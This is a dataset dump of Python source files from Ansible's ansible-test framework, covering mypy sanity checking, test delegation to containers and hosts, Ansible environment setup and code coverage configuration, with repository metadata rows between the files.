# display.info(f'Checking context "{context.name}"', verbosity=1)
env = os.environ.copy()
env['MYPYPATH'] = env['PYTHONPATH']
# The --no-site-packages option should not be used, as it will prevent loading of type stubs from the sanity test virtual environment.
# Enabling the --warn-unused-configs option would help keep the config files clean.
# However, the option can only be used when all files in tested contexts are evaluated.
# Unfortunately sanity tests have no way of making that determination currently.
# The option is also incompatible with incremental mode and caching.
cmd = [
# Below are arguments common to all contexts.
# They are kept here to avoid repetition in each config file.
sys.executable,
'-m', 'mypy',
'--show-column-numbers',
'--show-error-codes',
'--no-error-summary',
# This is a fairly common pattern in our code, so we'll allow it.
'--allow-redefinition',
# Since we specify the path(s) to test, it's important that mypy is configured to use the default behavior of following imports.
'--follow-imports', 'normal',
# Incremental results and caching do not provide significant performance benefits.
# It also prevents the use of the --warn-unused-configs option.
'--no-incremental',
'--cache-dir', '/dev/null',
# The platform is specified here so that results are consistent regardless of what platform the tests are run from.
# In the future, if testing of other platforms is desired, the platform should become part of the test specification, just like the Python version.
'--platform', 'linux',
# Despite what the documentation [1] states, the --python-version option does not cause mypy to search for a corresponding Python executable.
# It will instead use the Python executable that is used to run mypy itself.
# The --python-executable option can be used to specify the Python executable, with the default being the executable used to run mypy.
# As a precaution, that option is used in case the behavior of mypy is updated in the future to match the documentation.
# That should help guarantee that the Python executable providing type hints is the one used to run mypy.
# [1] https://mypy.readthedocs.io/en/stable/command_line.html#cmdoption-mypy-python-version
'--python-executable', sys.executable,
'--python-version', python_version,
# Below are context specific arguments.
# They are primarily useful for listing individual 'ignore_missing_imports' entries instead of using a global ignore.
'--config-file', config_path,
] # fmt: skip
cmd.extend(context_paths)
try:
completed_process = subprocess.run(cmd, env=env, capture_output=True, check=True, text=True)
stdout, stderr = completed_process.stdout, completed_process.stderr
if stdout or stderr:
raise Exception(f'{stdout=} {stderr=}')
except subprocess.CalledProcessError as ex:
if ex.returncode != 1 or ex.stderr or not ex.stdout:
raise
stdout = ex.stdout
pattern = re.compile(r'^(?P<path>[^:]*):(?P<line>[0-9]+):((?P<column>[0-9]+):)? (?P<level>[^:]+): (?P<message>.*)$')
parsed = parse_to_list_of_dict(pattern, stdout or '')
messages = [SanityMessage(
level=r['level'],
message=r['message'],
path=r['path'],
line=int(r['line']),
column=int(r.get('column') or '0'),
code='', # extracted from error level messages later
) for r in parsed]
return messages
@dataclasses.dataclass(frozen=True)
class MyPyContext:
"""Context details for a single run of mypy."""
name: str
paths: list[str]
python_versions: list[str]
@dataclasses.dataclass(frozen=True)
class SanityMessage:
message: str
path: str
line: int
column: int
level: str
code: str
def format(self) -> str:
if self.code:
msg = f'{self.code}: {self.message}'
else:
msg = self.message
return f'{self.path}:{self.line}:{self.column}: {msg}'
def parse_to_list_of_dict(pattern: re.Pattern, value: str) -> list[dict[str, t.Any]]:
matched = []
unmatched = []
for line in value.splitlines():
match = re.search(pattern, line)
if match:
matched.append(match.groupdict())
else:
unmatched.append(line)
if unmatched:
raise Exception(f'Pattern {pattern!r} did not match values:\n' + '\n'.join(unmatched))
return matched
if __name__ == '__main__':
main()
| 8,720
|
Python
|
.py
| 175
| 42.777143
| 155
| 0.675029
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,091
|
__init__.py
|
ansible_ansible/test/lib/ansible_test/__init__.py
|
# Empty __init__.py to allow relative imports to work under mypy.
| 66
|
Python
|
.py
| 1
| 65
| 65
| 0.738462
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,092
|
sanity.pylint.txt
|
ansible_ansible/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
|
# edit "sanity.pylint.in" and generate with: hacking/update-sanity-requirements.py --test pylint
astroid==3.3.5
dill==0.3.9
isort==5.13.2
mccabe==0.7.0
platformdirs==4.3.6
pylint==3.3.1
PyYAML==6.0.2
tomlkit==0.13.2
| 216
|
Python
|
.py
| 9
| 23
| 96
| 0.748792
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,093
|
delegation.py
|
ansible_ansible/test/lib/ansible_test/_internal/delegation.py
|
"""Delegate test execution to another environment."""
from __future__ import annotations
import collections.abc as c
import contextlib
import json
import os
import tempfile
import typing as t
from .constants import (
STATUS_HOST_CONNECTION_ERROR,
)
from .locale_util import (
STANDARD_LOCALE,
)
from .io import (
make_dirs,
)
from .config import (
CommonConfig,
EnvironmentConfig,
IntegrationConfig,
ShellConfig,
TestConfig,
UnitsConfig,
)
from .util import (
SubprocessError,
display,
filter_args,
ANSIBLE_LIB_ROOT,
ANSIBLE_TEST_ROOT,
OutputStream,
)
from .util_common import (
ResultType,
process_scoped_temporary_directory,
)
from .ansible_util import (
get_ansible_bin_path,
)
from .containers import (
support_container_context,
ContainerDatabase,
)
from .data import (
data_context,
)
from .payload import (
create_payload,
)
from .ci import (
get_ci_provider,
)
from .host_configs import (
OriginConfig,
PythonConfig,
)
from .connections import (
Connection,
DockerConnection,
SshConnection,
LocalConnection,
)
from .provisioning import (
HostState,
)
from .content_config import (
serialize_content_config,
)
@contextlib.contextmanager
def delegation_context(args: EnvironmentConfig, host_state: HostState) -> c.Iterator[None]:
"""Context manager for serialized host state during delegation."""
make_dirs(ResultType.TMP.path)
# noinspection PyUnusedLocal
python = host_state.controller_profile.python # make sure the python interpreter has been initialized before serializing host state
del python
with tempfile.TemporaryDirectory(prefix='host-', dir=ResultType.TMP.path) as host_dir:
args.host_settings.serialize(os.path.join(host_dir, 'settings.dat'))
host_state.serialize(os.path.join(host_dir, 'state.dat'))
serialize_content_config(args, os.path.join(host_dir, 'config.dat'))
args.host_path = os.path.join(ResultType.TMP.relative_path, os.path.basename(host_dir))
try:
yield
finally:
args.host_path = None
def delegate(args: CommonConfig, host_state: HostState, exclude: list[str], require: list[str]) -> None:
"""Delegate execution of ansible-test to another environment."""
assert isinstance(args, EnvironmentConfig)
with delegation_context(args, host_state):
if isinstance(args, TestConfig):
args.metadata.ci_provider = get_ci_provider().code
make_dirs(ResultType.TMP.path)
with tempfile.NamedTemporaryFile(prefix='metadata-', suffix='.json', dir=ResultType.TMP.path) as metadata_fd:
args.metadata_path = os.path.join(ResultType.TMP.relative_path, os.path.basename(metadata_fd.name))
args.metadata.to_file(args.metadata_path)
try:
delegate_command(args, host_state, exclude, require)
finally:
args.metadata_path = None
else:
delegate_command(args, host_state, exclude, require)
def delegate_command(args: EnvironmentConfig, host_state: HostState, exclude: list[str], require: list[str]) -> None:
"""Delegate execution based on the provided host state."""
con = host_state.controller_profile.get_origin_controller_connection()
working_directory = host_state.controller_profile.get_working_directory()
host_delegation = not isinstance(args.controller, OriginConfig)
if host_delegation:
if data_context().content.collection:
content_root = os.path.join(working_directory, data_context().content.collection.directory)
else:
content_root = os.path.join(working_directory, 'ansible')
ansible_bin_path = os.path.join(working_directory, 'ansible', 'bin')
with tempfile.NamedTemporaryFile(prefix='ansible-source-', suffix='.tgz') as payload_file:
create_payload(args, payload_file.name)
con.extract_archive(chdir=working_directory, src=payload_file)
else:
content_root = working_directory
ansible_bin_path = get_ansible_bin_path(args)
command = generate_command(args, host_state.controller_profile.python, ansible_bin_path, content_root, exclude, require)
if isinstance(con, SshConnection):
ssh = con.settings
else:
ssh = None
options = []
if isinstance(args, IntegrationConfig) and args.controller.is_managed and all(target.is_managed for target in args.targets):
if not args.allow_destructive:
options.append('--allow-destructive')
with support_container_context(args, ssh) as containers: # type: t.Optional[ContainerDatabase]
if containers:
options.extend(['--containers', json.dumps(containers.to_dict())])
# Run unit tests unprivileged to prevent stray writes to the source tree.
# Also disconnect from the network once requirements have been installed.
if isinstance(args, UnitsConfig) and isinstance(con, DockerConnection):
pytest_user = 'pytest'
writable_dirs = [
os.path.join(content_root, ResultType.JUNIT.relative_path),
os.path.join(content_root, ResultType.COVERAGE.relative_path),
]
con.run(['mkdir', '-p'] + writable_dirs, capture=True)
con.run(['chmod', '777'] + writable_dirs, capture=True)
con.run(['chmod', '755', working_directory], capture=True)
con.run(['useradd', pytest_user, '--create-home'], capture=True)
con.run(insert_options(command, options + ['--requirements-mode', 'only']), capture=False)
container = con.inspect()
networks = container.get_network_names()
if networks is not None:
for network in networks:
try:
con.disconnect_network(network)
except SubprocessError:
display.warning(
'Unable to disconnect network "%s" (this is normal under podman). '
'Tests will not be isolated from the network. Network-related tests may '
'misbehave.' % (network,)
)
else:
display.warning('Network disconnection is not supported (this is normal under podman). '
'Tests will not be isolated from the network. Network-related tests may misbehave.')
options.extend(['--requirements-mode', 'skip'])
con.user = pytest_user
success = False
status = 0
try:
# When delegating, preserve the original separate stdout/stderr streams, but only when the following conditions are met:
# 1) Display output is being sent to stderr. This indicates the output on stdout must be kept separate from stderr.
# 2) The delegation is non-interactive. Interactive mode, which generally uses a TTY, is not compatible with intercepting stdout/stderr.
# The downside to having separate streams is that individual lines of output from each are more likely to appear out-of-order.
output_stream = OutputStream.ORIGINAL if args.display_stderr and not args.interactive else None
con.run(insert_options(command, options), capture=False, interactive=args.interactive, output_stream=output_stream)
success = True
except SubprocessError as ex:
status = ex.status
raise
finally:
if host_delegation:
download_results(args, con, content_root, success)
if not success and status == STATUS_HOST_CONNECTION_ERROR:
for target in host_state.target_profiles:
target.on_target_failure() # when the controller is delegated, report failures after delegation fails
def insert_options(command: list[str], options: list[str]) -> list[str]:
"""Insert addition command line options into the given command and return the result."""
result = []
for arg in command:
if options and arg.startswith('--'):
result.extend(options)
options = None
result.append(arg)
return result
def download_results(args: EnvironmentConfig, con: Connection, content_root: str, success: bool) -> None:
"""Download results from a delegated controller."""
remote_results_root = os.path.join(content_root, data_context().content.results_path)
local_test_root = os.path.dirname(os.path.join(data_context().content.root, data_context().content.results_path))
remote_test_root = os.path.dirname(remote_results_root)
remote_results_name = os.path.basename(remote_results_root)
make_dirs(local_test_root) # make sure directory exists for collections which have no tests
with tempfile.NamedTemporaryFile(prefix='ansible-test-result-', suffix='.tgz') as result_file:
try:
con.create_archive(chdir=remote_test_root, name=remote_results_name, dst=result_file, exclude=ResultType.TMP.name)
except SubprocessError as ex:
if success:
raise # download errors are fatal if tests succeeded
# surface download failures as a warning here to avoid masking test failures
display.warning(f'Failed to download results while handling an exception: {ex}')
else:
result_file.seek(0)
local_con = LocalConnection(args)
local_con.extract_archive(chdir=local_test_root, src=result_file)
def generate_command(
args: EnvironmentConfig,
python: PythonConfig,
ansible_bin_path: str,
content_root: str,
exclude: list[str],
require: list[str],
) -> list[str]:
"""Generate the command necessary to delegate ansible-test."""
cmd = [os.path.join(ansible_bin_path, 'ansible-test')]
cmd = [python.path] + cmd
env_vars = dict(
ANSIBLE_TEST_CONTENT_ROOT=content_root,
)
if isinstance(args.controller, OriginConfig):
# Expose the ansible and ansible_test library directories to the Python environment.
# This is only required when delegation is used on the origin host.
library_path = process_scoped_temporary_directory(args)
os.symlink(ANSIBLE_LIB_ROOT, os.path.join(library_path, 'ansible'))
os.symlink(ANSIBLE_TEST_ROOT, os.path.join(library_path, 'ansible_test'))
env_vars.update(
PYTHONPATH=library_path,
)
else:
# When delegating to a host other than the origin, the locale must be explicitly set.
# Setting of the locale for the origin host is handled by common_environment().
# Not all connections support setting the locale, and for those that do, it isn't guaranteed to work.
# This is needed to make sure the delegated environment is configured for UTF-8 before running Python.
env_vars.update(
LC_ALL=STANDARD_LOCALE,
)
# Propagate the TERM environment variable to the remote host when using the shell command.
if isinstance(args, ShellConfig):
term = os.environ.get('TERM')
if term is not None:
env_vars.update(TERM=term)
env_args = ['%s=%s' % (key, env_vars[key]) for key in sorted(env_vars)]
cmd = ['/usr/bin/env'] + env_args + cmd
cmd += list(filter_options(args, args.host_settings.filtered_args, exclude, require))
return cmd
def filter_options(
args: EnvironmentConfig,
argv: list[str],
exclude: list[str],
require: list[str],
) -> c.Iterable[str]:
"""Return an iterable that filters out unwanted CLI options and injects new ones as requested."""
replace: list[tuple[str, int, t.Optional[t.Union[bool, str, list[str]]]]] = [
('--truncate', 1, str(args.truncate)),
('--color', 1, 'yes' if args.color else 'no'),
('--redact', 0, False),
('--no-redact', 0, not args.redact),
('--host-path', 1, args.host_path),
]
if isinstance(args, TestConfig):
replace.extend([
('--changed', 0, False),
('--tracked', 0, False),
('--untracked', 0, False),
('--ignore-committed', 0, False),
('--ignore-staged', 0, False),
('--ignore-unstaged', 0, False),
('--changed-from', 1, False),
('--changed-path', 1, False),
('--metadata', 1, args.metadata_path),
('--exclude', 1, exclude),
('--require', 1, require),
('--base-branch', 1, False),
])
pass_through_args: list[str] = []
for arg in filter_args(argv, {option: count for option, count, replacement in replace}):
if arg == '--' or pass_through_args:
pass_through_args.append(arg)
continue
yield arg
for option, _count, replacement in replace:
if not replacement:
continue
if isinstance(replacement, bool):
yield option
elif isinstance(replacement, str):
yield from [option, replacement]
elif isinstance(replacement, list):
for item in replacement:
yield from [option, item]
yield from args.delegate_args
yield from pass_through_args
| 13,418
|
Python
|
.py
| 294
| 37.068027
| 148
| 0.654501
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,094
|
ansible_util.py
|
ansible_ansible/test/lib/ansible_test/_internal/ansible_util.py
|
"""Miscellaneous utility functions and classes specific to ansible cli tools."""
from __future__ import annotations
import json
import os
import shutil
import typing as t
from .constants import (
ANSIBLE_BIN_SYMLINK_MAP,
SOFT_RLIMIT_NOFILE,
)
from .util import (
common_environment,
ApplicationError,
ANSIBLE_LIB_ROOT,
ANSIBLE_TEST_ROOT,
ANSIBLE_TEST_DATA_ROOT,
ANSIBLE_ROOT,
ANSIBLE_SOURCE_ROOT,
ANSIBLE_TEST_TOOLS_ROOT,
MODE_FILE_EXECUTE,
raw_command,
verified_chmod,
)
from .util_common import (
create_temp_dir,
ResultType,
intercept_python,
get_injector_path,
)
from .config import (
IntegrationConfig,
PosixIntegrationConfig,
EnvironmentConfig,
CommonConfig,
)
from .data import (
data_context,
)
from .python_requirements import (
install_requirements,
)
from .host_configs import (
PythonConfig,
)
from .thread import (
mutex,
)
def parse_inventory(args: EnvironmentConfig, inventory_path: str) -> dict[str, t.Any]:
"""Return a dict parsed from the given inventory file."""
cmd = ['ansible-inventory', '-i', inventory_path, '--list']
env = ansible_environment(args)
inventory = json.loads(intercept_python(args, args.controller_python, cmd, env, capture=True, always=True)[0])
return inventory
def get_hosts(inventory: dict[str, t.Any], group_name: str) -> dict[str, dict[str, t.Any]]:
"""Return a dict of hosts from the specified group in the given inventory."""
hostvars = inventory.get('_meta', {}).get('hostvars', {})
group = inventory.get(group_name, {})
host_names = group.get('hosts', [])
hosts = dict((name, hostvars.get(name, {})) for name in host_names)
return hosts
def ansible_environment(args: CommonConfig, color: bool = True, ansible_config: t.Optional[str] = None) -> dict[str, str]:
"""Return a dictionary of environment variables to use when running Ansible commands."""
env = common_environment()
path = env['PATH']
ansible_bin_path = get_ansible_bin_path(args)
if not path.startswith(ansible_bin_path + os.path.pathsep):
path = ansible_bin_path + os.path.pathsep + path
if not ansible_config:
# use the default empty configuration unless one has been provided
ansible_config = args.get_ansible_config()
if not args.explain and not os.path.exists(ansible_config):
raise ApplicationError('Configuration not found: %s' % ansible_config)
ansible = dict(
ANSIBLE_PYTHON_MODULE_RLIMIT_NOFILE=str(SOFT_RLIMIT_NOFILE),
ANSIBLE_FORCE_COLOR='%s' % 'true' if args.color and color else 'false',
ANSIBLE_FORCE_HANDLERS='true', # allow cleanup handlers to run when tests fail
ANSIBLE_HOST_PATTERN_MISMATCH='error', # prevent tests from unintentionally passing when hosts are not found
ANSIBLE_INVENTORY='/dev/null', # force tests to provide inventory
ANSIBLE_DEPRECATION_WARNINGS='false',
ANSIBLE_HOST_KEY_CHECKING='false',
ANSIBLE_RETRY_FILES_ENABLED='false',
ANSIBLE_CONFIG=ansible_config,
ANSIBLE_LIBRARY='/dev/null',
ANSIBLE_DEVEL_WARNING='false', # Don't show warnings that CI is running devel
PYTHONPATH=get_ansible_python_path(args),
PAGER='/bin/cat',
PATH=path,
# give TQM worker processes time to report code coverage results
# without this the last task in a play may write no coverage file, an empty file, or an incomplete file
# enabled even when not using code coverage to surface warnings when worker processes do not exit cleanly
ANSIBLE_WORKER_SHUTDOWN_POLL_COUNT='100',
ANSIBLE_WORKER_SHUTDOWN_POLL_DELAY='0.1',
# ansible-test specific environment variables require an 'ANSIBLE_TEST_' prefix to distinguish them from ansible-core env vars defined by config
ANSIBLE_TEST_ANSIBLE_LIB_ROOT=ANSIBLE_LIB_ROOT, # used by the coverage injector
)
if isinstance(args, IntegrationConfig) and args.coverage:
# standard path injection is not effective for the persistent connection helper, instead the location must be configured
# it only requires the injector for code coverage
# the correct python interpreter is already selected using the sys.executable used to invoke ansible
ansible.update(
_ANSIBLE_CONNECTION_PATH=os.path.join(get_injector_path(), 'ansible_connection_cli_stub.py'),
)
if isinstance(args, PosixIntegrationConfig):
ansible.update(
ANSIBLE_PYTHON_INTERPRETER='/set/ansible_python_interpreter/in/inventory', # force tests to set ansible_python_interpreter in inventory
)
env.update(ansible)
if args.debug:
env.update(
ANSIBLE_DEBUG='true',
ANSIBLE_LOG_PATH=os.path.join(ResultType.LOGS.name, 'debug.log'),
)
if data_context().content.collection:
env.update(
ANSIBLE_COLLECTIONS_PATH=data_context().content.collection.root,
)
if data_context().content.is_ansible:
env.update(configure_plugin_paths(args))
return env
def configure_plugin_paths(args: CommonConfig) -> dict[str, str]:
"""Return environment variables with paths to plugins relevant for the current command."""
if not isinstance(args, IntegrationConfig):
return {}
support_path = os.path.join(ANSIBLE_SOURCE_ROOT, 'test', 'support', args.command)
# provide private copies of collections for integration tests
collection_root = os.path.join(support_path, 'collections')
env = dict(
ANSIBLE_COLLECTIONS_PATH=collection_root,
)
# provide private copies of plugins for integration tests
plugin_root = os.path.join(support_path, 'plugins')
plugin_list = [
'action',
'become',
'cache',
'callback',
'cliconf',
'connection',
'filter',
'httpapi',
'inventory',
'lookup',
'netconf',
# 'shell' is not configurable
'strategy',
'terminal',
'test',
'vars',
]
# most plugins follow a standard naming convention
plugin_map = dict(('%s_plugins' % name, name) for name in plugin_list)
# these plugins do not follow the standard naming convention
plugin_map.update(
doc_fragment='doc_fragments',
library='modules',
module_utils='module_utils',
)
env.update(dict(('ANSIBLE_%s' % key.upper(), os.path.join(plugin_root, value)) for key, value in plugin_map.items()))
# only configure directories which exist
env = dict((key, value) for key, value in env.items() if os.path.isdir(value))
return env
@mutex
def get_ansible_bin_path(args: CommonConfig) -> str:
"""
Return a directory usable for PATH, containing only the ansible entry points.
If a temporary directory is required, it will be cached for the lifetime of the process and cleaned up at exit.
"""
try:
return get_ansible_bin_path.bin_path # type: ignore[attr-defined]
except AttributeError:
pass
if ANSIBLE_SOURCE_ROOT:
# when running from source there is no need for a temporary directory since we already have known entry point scripts
bin_path = os.path.join(ANSIBLE_ROOT, 'bin')
else:
# when not running from source the installed entry points cannot be relied upon
# doing so would require using the interpreter specified by those entry points, which conflicts with using our interpreter and injector
# instead a temporary directory is created which contains only ansible entry points
# symbolic links cannot be used since the files are likely not executable
bin_path = create_temp_dir(prefix='ansible-test-', suffix='-bin')
bin_links = {os.path.join(bin_path, name): get_cli_path(path) for name, path in ANSIBLE_BIN_SYMLINK_MAP.items()}
if not args.explain:
for dst, src in bin_links.items():
shutil.copy(src, dst)
verified_chmod(dst, MODE_FILE_EXECUTE)
get_ansible_bin_path.bin_path = bin_path # type: ignore[attr-defined]
return bin_path
def get_cli_path(path: str) -> str:
"""Return the absolute path to the CLI script from the given path which is relative to the `bin` directory of the original source tree layout."""
path_rewrite = {
'../lib/ansible/': ANSIBLE_LIB_ROOT,
'../test/lib/ansible_test/': ANSIBLE_TEST_ROOT,
}
for prefix, destination in path_rewrite.items():
if path.startswith(prefix):
return os.path.join(destination, path[len(prefix):])
raise RuntimeError(path)
# noinspection PyUnusedLocal
@mutex
def get_ansible_python_path(args: CommonConfig) -> str:
"""
Return a directory usable for PYTHONPATH, containing only the ansible package.
If a temporary directory is required, it will be cached for the lifetime of the process and cleaned up at exit.
"""
del args # not currently used
try:
return get_ansible_python_path.python_path # type: ignore[attr-defined]
except AttributeError:
pass
if ANSIBLE_SOURCE_ROOT:
# when running from source there is no need for a temporary directory to isolate the ansible package
python_path = os.path.dirname(ANSIBLE_LIB_ROOT)
else:
# when not running from source the installed directory is unsafe to add to PYTHONPATH
# doing so would expose many unwanted packages on sys.path
# instead a temporary directory is created which contains only ansible using a symlink
python_path = create_temp_dir(prefix='ansible-test-')
os.symlink(ANSIBLE_LIB_ROOT, os.path.join(python_path, 'ansible'))
get_ansible_python_path.python_path = python_path # type: ignore[attr-defined]
return python_path
class CollectionDetail:
"""Collection detail."""
def __init__(self) -> None:
self.version: t.Optional[str] = None
class CollectionDetailError(ApplicationError):
"""An error occurred retrieving collection detail."""
def __init__(self, reason: str) -> None:
super().__init__('Error collecting collection detail: %s' % reason)
self.reason = reason
def get_collection_detail(python: PythonConfig) -> CollectionDetail:
"""Return collection detail."""
collection = data_context().content.collection
directory = os.path.join(collection.root, collection.directory)
stdout = raw_command([python.path, os.path.join(ANSIBLE_TEST_TOOLS_ROOT, 'collection_detail.py'), directory], capture=True)[0]
result = json.loads(stdout)
error = result.get('error')
if error:
raise CollectionDetailError(error)
version = result.get('version')
detail = CollectionDetail()
detail.version = str(version) if version is not None else None
return detail
def run_playbook(
args: EnvironmentConfig,
inventory_path: str,
playbook: str,
capture: bool,
variables: t.Optional[dict[str, t.Any]] = None,
) -> None:
"""Run the specified playbook using the given inventory file and playbook variables."""
playbook_path = os.path.join(ANSIBLE_TEST_DATA_ROOT, 'playbooks', playbook)
cmd = ['ansible-playbook', '-i', inventory_path, playbook_path]
if variables:
cmd.extend(['-e', json.dumps(variables)])
if args.verbosity:
cmd.append('-%s' % ('v' * args.verbosity))
install_requirements(args, args.controller_python, ansible=True) # run_playbook()
env = ansible_environment(args)
intercept_python(args, args.controller_python, cmd, env, capture=capture)
| 11,690
|
Python
|
.py
| 259
| 38.76834
| 152
| 0.692084
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,095
|
coverage_util.py
|
ansible_ansible/test/lib/ansible_test/_internal/coverage_util.py
|
"""Utility code for facilitating collection of code coverage when running tests."""
from __future__ import annotations
import dataclasses
import os
import sqlite3
import tempfile
import typing as t
from .config import (
IntegrationConfig,
SanityConfig,
TestConfig,
)
from .io import (
write_text_file,
make_dirs,
open_binary_file,
)
from .util import (
ApplicationError,
InternalError,
COVERAGE_CONFIG_NAME,
remove_tree,
sanitize_host_name,
str_to_version,
)
from .data import (
data_context,
)
from .util_common import (
ExitHandler,
intercept_python,
ResultType,
)
from .host_configs import (
DockerConfig,
HostConfig,
OriginConfig,
PosixRemoteConfig,
PosixSshConfig,
PythonConfig,
)
from .constants import (
SUPPORTED_PYTHON_VERSIONS,
CONTROLLER_PYTHON_VERSIONS,
)
from .thread import (
mutex,
)
@dataclasses.dataclass(frozen=True)
class CoverageVersion:
"""Details about a coverage version and its supported Python versions."""
coverage_version: str
schema_version: int
min_python: tuple[int, int]
max_python: tuple[int, int]
COVERAGE_VERSIONS = (
# IMPORTANT: Keep this in sync with the ansible-test.txt requirements file.
CoverageVersion('7.6.1', 7, (3, 8), (3, 13)),
)
"""
This tuple specifies the coverage version to use for Python version ranges.
"""
CONTROLLER_COVERAGE_VERSION = COVERAGE_VERSIONS[0]
"""The coverage version supported on the controller."""
class CoverageError(ApplicationError):
"""Exception caused while attempting to read a coverage file."""
def __init__(self, path: str, message: str) -> None:
self.path = path
self.message = message
super().__init__(f'Error reading coverage file "{os.path.relpath(path)}": {message}')
def get_coverage_version(version: str) -> CoverageVersion:
"""Return the coverage version to use with the specified Python version."""
python_version = str_to_version(version)
supported_versions = [entry for entry in COVERAGE_VERSIONS if entry.min_python <= python_version <= entry.max_python]
if not supported_versions:
raise InternalError(f'Python {version} has no matching entry in COVERAGE_VERSIONS.')
if len(supported_versions) > 1:
raise InternalError(f'Python {version} has multiple matching entries in COVERAGE_VERSIONS.')
coverage_version = supported_versions[0]
return coverage_version
def get_coverage_file_schema_version(path: str) -> int:
"""
Return the schema version from the specified coverage file.
SQLite based files report schema version 1 or later.
JSON based files are reported as schema version 0.
An exception is raised if the file is not recognized or the schema version cannot be determined.
"""
with open_binary_file(path) as file_obj:
header = file_obj.read(16)
if header.startswith(b'!coverage.py: '):
return 0
if header.startswith(b'SQLite'):
return get_sqlite_schema_version(path)
raise CoverageError(path, f'Unknown header: {header!r}')
def get_sqlite_schema_version(path: str) -> int:
"""Return the schema version from a SQLite based coverage file."""
try:
with sqlite3.connect(path) as connection:
cursor = connection.cursor()
cursor.execute('select version from coverage_schema')
schema_version = cursor.fetchmany(1)[0][0]
except Exception as ex:
raise CoverageError(path, f'SQLite error: {ex}') from ex
if not isinstance(schema_version, int):
raise CoverageError(path, f'Schema version is {type(schema_version)} instead of {int}: {schema_version}')
if schema_version < 1:
raise CoverageError(path, f'Schema version is out-of-range: {schema_version}')
return schema_version
def cover_python(
args: TestConfig,
python: PythonConfig,
cmd: list[str],
target_name: str,
env: dict[str, str],
capture: bool,
data: t.Optional[str] = None,
cwd: t.Optional[str] = None,
) -> tuple[t.Optional[str], t.Optional[str]]:
"""Run a command while collecting Python code coverage."""
if args.coverage:
env.update(get_coverage_environment(args, target_name, python.version))
return intercept_python(args, python, cmd, env, capture, data, cwd)
def get_coverage_platform(config: HostConfig) -> str:
"""Return the platform label for the given host config."""
if isinstance(config, PosixRemoteConfig):
platform = f'remote-{sanitize_host_name(config.name)}'
elif isinstance(config, DockerConfig):
platform = f'docker-{sanitize_host_name(config.name)}'
elif isinstance(config, PosixSshConfig):
platform = f'ssh-{sanitize_host_name(config.host)}'
elif isinstance(config, OriginConfig):
platform = 'origin' # previous versions of ansible-test used "local-{python_version}"
else:
raise NotImplementedError(f'Coverage platform label not defined for type: {type(config)}')
return platform
def get_coverage_environment(
args: TestConfig,
target_name: str,
version: str,
) -> dict[str, str]:
"""Return environment variables needed to collect code coverage."""
# unit tests, sanity tests and other special cases (localhost only)
# config is in a temporary directory
# results are in the source tree
config_file = get_coverage_config(args)
coverage_name = '='.join((args.command, target_name, get_coverage_platform(args.controller), f'python-{version}', 'coverage'))
coverage_dir = os.path.join(data_context().content.root, data_context().content.results_path, ResultType.COVERAGE.name)
coverage_file = os.path.join(coverage_dir, coverage_name)
make_dirs(coverage_dir)
if args.coverage_check:
# cause the 'coverage' module to be found, but not imported or enabled
coverage_file = ''
# Enable code coverage collection on local Python programs (this does not include Ansible modules).
# Used by the injectors to support code coverage.
# Used by the pytest unit test plugin to support code coverage.
# The COVERAGE_FILE variable is also used directly by the 'coverage' module.
env = dict(
COVERAGE_CONF=config_file,
COVERAGE_FILE=coverage_file,
)
return env
@mutex
def get_coverage_config(args: TestConfig) -> str:
"""Return the path to the coverage config, creating the config if it does not already exist."""
try:
return get_coverage_config.path # type: ignore[attr-defined]
except AttributeError:
pass
coverage_config = generate_coverage_config(args)
if args.explain:
temp_dir = '/tmp/coverage-temp-dir'
else:
temp_dir = tempfile.mkdtemp()
ExitHandler.register(lambda: remove_tree(temp_dir))
path = os.path.join(temp_dir, COVERAGE_CONFIG_NAME)
if not args.explain:
write_text_file(path, coverage_config)
get_coverage_config.path = path # type: ignore[attr-defined]
return path
def generate_coverage_config(args: TestConfig) -> str:
"""Generate code coverage configuration for tests."""
if data_context().content.collection:
coverage_config = generate_collection_coverage_config(args)
else:
coverage_config = generate_ansible_coverage_config()
return coverage_config
def generate_ansible_coverage_config() -> str:
"""Generate code coverage configuration for Ansible tests."""
coverage_config = '''
[run]
branch = True
concurrency =
multiprocessing
thread
parallel = True
omit =
*/python*/dist-packages/*
*/python*/site-packages/*
*/python*/distutils/*
*/pyshared/*
*/pytest
*/AnsiballZ_*.py
*/test/results/*
'''
return coverage_config
def generate_collection_coverage_config(args: TestConfig) -> str:
"""Generate code coverage configuration for Ansible Collection tests."""
coverage_config = '''
[run]
branch = True
concurrency =
multiprocessing
thread
parallel = True
disable_warnings =
no-data-collected
'''
if isinstance(args, IntegrationConfig):
coverage_config += '''
include =
%s/*
*/%s/*
''' % (data_context().content.root, data_context().content.collection.directory)
elif isinstance(args, SanityConfig):
# temporary work-around for import sanity test
coverage_config += '''
include =
%s/*
omit =
%s/*
''' % (data_context().content.root, os.path.join(data_context().content.root, data_context().content.results_path))
else:
coverage_config += '''
include =
%s/*
''' % data_context().content.root
return coverage_config
def self_check() -> None:
"""Check for internal errors due to incorrect code changes."""
# Verify all supported Python versions have a coverage version.
for version in SUPPORTED_PYTHON_VERSIONS:
get_coverage_version(version)
# Verify all controller Python versions are mapped to the latest coverage version.
for version in CONTROLLER_PYTHON_VERSIONS:
if get_coverage_version(version) != CONTROLLER_COVERAGE_VERSION:
raise InternalError(f'Controller Python version {version} is not mapped to the latest coverage version.')
self_check()
| 9,283
|
Python
|
.py
| 247
| 32.659919
| 130
| 0.706827
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,096
|
io.py
|
ansible_ansible/test/lib/ansible_test/_internal/io.py
|
"""Functions for disk IO."""
from __future__ import annotations
import io
import json
import os
import typing as t
from .encoding import (
ENCODING,
to_bytes,
to_text,
)
def read_json_file(path: str) -> t.Any:
"""Parse and return the json content from the specified path."""
return json.loads(read_text_file(path))
def read_text_file(path: str) -> str:
"""Return the contents of the specified path as text."""
